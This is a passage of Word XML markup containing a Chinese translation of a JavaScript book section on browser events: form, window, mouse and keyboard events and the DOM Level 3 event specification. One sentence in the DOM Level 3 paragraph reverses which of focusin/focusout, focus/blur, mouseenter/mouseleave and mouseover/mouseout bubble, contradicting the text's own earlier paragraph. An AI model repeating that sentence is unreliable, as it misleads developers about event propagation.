        <w:t>事件规范也正在标准化它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后注意，无论用户何时输入文字（通过键盘或剪切和粘贴）到＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞和其他文本输入表单元素，除</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>外的浏览器都会触发</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件。不像</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件，每次</w:t>
      </w:r>
      <w:r>
        <w:t>文字插入都会触发</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件。遗憾的是，</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件对象没有指定输入文本的内容。（稍后介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件将会成为这个事件的有用替代方案。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.Window</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>事件是指事件的发生与浏览器窗口本身而非窗口中显示的任何特定文档内容相关。但是，这些事件中有一些会和文档元素上发生的事件同名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件是这些事件中最重要的一个，当文档和其所有外部资源（比如图片）完全加载并显示给用户时就会触发它。有关</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件的讨论贯穿整个第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件的替代方案，当文档和其元素为操作准备就绪，但外部资源完全加载完毕之前，浏览器就会尽早触发它们。</w:t>
      </w:r>
      <w:r>
        <w:t>17.4</w:t>
      </w:r>
      <w:r>
        <w:t>节有这些与文件加载相关事件的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:t>事件和</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>相对，当用户离开当前文档转向其他文档时会触发它。</w:t>
      </w:r>
      <w:r>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序可以用于保存用户的状态，但它不能用于取消用户转向其</w:t>
      </w:r>
      <w:r>
        <w:t>他地方。</w:t>
      </w:r>
      <w:r>
        <w:t>beforeunload</w:t>
      </w:r>
      <w:r>
        <w:t>事件和</w:t>
      </w:r>
      <w:r>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:t>类似，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但它能提供询问用户是否确定离开当前页面的机会。如果</w:t>
      </w:r>
      <w:r>
        <w:t>beforeunload</w:t>
      </w:r>
      <w:r>
        <w:t>的处理程序返回字符串，那么在新页面加载之前，字符串会出现在展示给用户确认的对话框上，这样用户将有机会取消其跳转而留在当前页上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性有点像事件处理程序，当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>出错时会触发它。但是，它不是真正的事件处理程序，因为它能用不同的参数来调用。更多详细信息请看</w:t>
      </w:r>
      <w:r>
        <w:t>14.6</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素这样的单个文档元素也能为</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册处</w:t>
      </w:r>
      <w:r>
        <w:t>理程序。当外部资源（例如图片）完全加载或发生阻止加载的错误时就会触发它们。某些浏览器也支持</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>将其标准化），当图片（或其他网络资源）因为用户停止加载进程而导致失败就会触发它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面介绍的表单元素的</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件也能用做</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>事件，当浏览器窗口从操作系统中得到或失去键盘焦点时会触发它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，当用户调整浏览器窗口大小或滚动它时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>resize</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件也能在任何可以滚动的文档元素上触发，比如那些设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>16.2.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）的元素。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>resize</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的事件对象是一个非常普通的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象，它没有指定调整大小或发生滚动的详细信息属性，但可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>15.8</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍的技术来确定新窗口的尺寸和滚动条的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户在文档上移动或单击鼠标时都会产生鼠标事件。这些事件在鼠标指针所对应的最深嵌套元素上触发，但它们会冒泡直到文档最顶层。传递给鼠标事件处理程序的事件对象有属性集，它们描述了当事件发生时鼠标的位置和按键状态，也指明当时是否有任何辅助键按下。</w:t>
      </w:r>
      <w:r>
        <w:t>clientX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了鼠标在窗口</w:t>
      </w:r>
      <w:r>
        <w:t>坐标中的位置，</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了按下的鼠标键是哪个。（无论如何请看</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>参考页，因为这些属性难以简单使用。）当键盘辅助键按下时，对应的属性</w:t>
      </w:r>
      <w:r>
        <w:t>altkey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ctrlKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>metaKey</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shiftKey</w:t>
      </w:r>
      <w:r>
        <w:t>会设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。而对于</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>detail</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了其是单击、双击还是三击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户每次移动或拖动鼠标时，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这些事件的发生非常频繁，所以</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序一定不能触发计算密集型任务。当用户按下或释放鼠标按键时，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mous</w:t>
      </w:r>
      <w:r>
        <w:t>eup</w:t>
      </w:r>
      <w:r>
        <w:t>事件。通过注册</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，可以探测和响应鼠标的拖动。合理地这样做能够捕获鼠标事件，甚</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>至当鼠标从开始元素移出时我们都能持续地接受到</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>17.5</w:t>
      </w:r>
      <w:r>
        <w:t>节包含一个处理拖动的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件队列之后，浏览器也会触发</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件。之前介绍过</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件是独立于设备的表单事件，但实际上它不仅仅在表单元素上触发，它可以在任何文档元素上触发，同时传递拥有之前介绍的所有鼠标相关额外字段的事件对象。如果用户在相当短的时间内连续两次单</w:t>
      </w:r>
      <w:r>
        <w:t>击鼠标按键，跟在第二个</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件之后是</w:t>
      </w:r>
      <w:r>
        <w:t>dblclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当单击鼠标右键时，浏览器通常会显示上下文菜单（</w:t>
      </w:r>
      <w:r>
        <w:t>context menu</w:t>
      </w:r>
      <w:r>
        <w:t>）。在显示菜单之前，它们通常会触发</w:t>
      </w:r>
      <w:r>
        <w:t>contextmenu</w:t>
      </w:r>
      <w:r>
        <w:t>事件，而取消这个事件就可以阻止菜单的显示。这个事件也是获得鼠标右击通知的简单方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户移动鼠标指针从而使它悬停到新元素上时，浏览器就会在该元素上触发</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当鼠标移动指针从而使它不再悬停在某个元素上时，浏览器就会在该元素上触发</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件。对于这些事件，事件对象将有</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:t>性指明这个过程涉及的其他元素。（到</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>参考页查看</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>等效属性。）</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件和这里介绍的所有鼠标事件一样会冒泡。但这通常不方便，因为当触发</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序时，你不得不检查鼠标是否真的离开目标元素还是仅仅是从这个元素的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个子元素移动到另一个。正因为如此，</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>提供了这些事件的不冒泡版本</w:t>
      </w:r>
      <w:r>
        <w:t>mouseenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseleave</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JQuery</w:t>
      </w:r>
      <w:r>
        <w:t>模拟非</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中这些事件的支持（见第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章），同时</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范把它们标准化了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户</w:t>
      </w:r>
      <w:r>
        <w:t>滚动鼠标滚轮时，浏览器触发</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件（或在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中是</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件）。传递的事件对象属性指定滚轮转动的大小和方向。</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范正在标准化一个更通用的多维</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件，一旦实现将取代</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>17.6</w:t>
      </w:r>
      <w:r>
        <w:t>节包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>键盘事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当键盘聚焦到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器时，用户每次按下或释放键盘上的按键时都会产生事件。键盘快捷键对于操作系统和浏览器本身有特殊意义，它们经常被操作系统或浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>吃掉</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>并对</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序不可见。无论任何文档元素获取键盘焦点都会触发键盘事件，并且它们会冒泡到</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果没有元素获得焦点，可以直接在文档上触发事件。传递给键盘事件处理程序的事件对象有</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>字段，它指定按下或释放的键是哪个。除了</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>，键盘事件对象也有</w:t>
      </w:r>
      <w:r>
        <w:t>altKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ctrlKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>metaKey</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shiftKey</w:t>
      </w:r>
      <w:r>
        <w:t>，描述键盘辅助键的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件是低级键盘事件，无论何时按下或释放按键（甚至是辅助键）都会触发它们。当</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件产生可打</w:t>
      </w:r>
      <w:r>
        <w:t>印字符时，在</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>之间会触发另外一个</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当按下键重复产生字符时，在</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件之前可能产生很多</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>是较高级的文本事件，其事件对象指定产生的字符而非按下的键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，但有一些互用性问题，因为事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性值从未标准化过。</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范尝试解决之前的互用性问题，但尚未实施。</w:t>
      </w:r>
      <w:r>
        <w:t>17.9</w:t>
      </w:r>
      <w:r>
        <w:t>节包含处理</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件的示例，</w:t>
      </w:r>
      <w:r>
        <w:t>17.8</w:t>
      </w:r>
      <w:r>
        <w:t>节包含处理</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="17_1_2_DOMShi_Jian_"/>
      <w:r>
        <w:t>17.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>开发</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范已经长达十年之久。在写本章时，它已经做了大量修订使其适合当前浏览器的现状，现在终于处于标准化的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>最后征集工作草案</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>last call working draft</w:t>
      </w:r>
      <w:r>
        <w:t>）阶段。它标准化了前面介绍的许多传统事件，同时增加了这里介绍的一些新事件。这些新事件类型尚未得到广泛支持，一旦标准确定，我们就期望浏览器厂商能实现它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如上所述，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范标准化了不冒泡的</w:t>
      </w:r>
      <w:r>
        <w:t>focusin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>focusout</w:t>
      </w:r>
      <w:r>
        <w:t>事件来取代冒泡的</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>事件，标准化了冒泡的</w:t>
      </w:r>
      <w:r>
        <w:t>mous</w:t>
      </w:r>
      <w:r>
        <w:t>eenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseleave</w:t>
      </w:r>
      <w:r>
        <w:t>事件来取代不冒泡的</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件。此版本的标准也弃用了大量由</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范定义但未得到广泛实现的事件类型。浏览器依旧允许产生像</w:t>
      </w:r>
      <w:r>
        <w:t>DOMActivate</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOMFocusIn</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DOMNodeInserted</w:t>
      </w:r>
      <w:r>
        <w:t>这样的事件，但它们不再必要，同时本书的文档也不会列出它们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范中新增内容有通过</w:t>
      </w:r>
      <w:r>
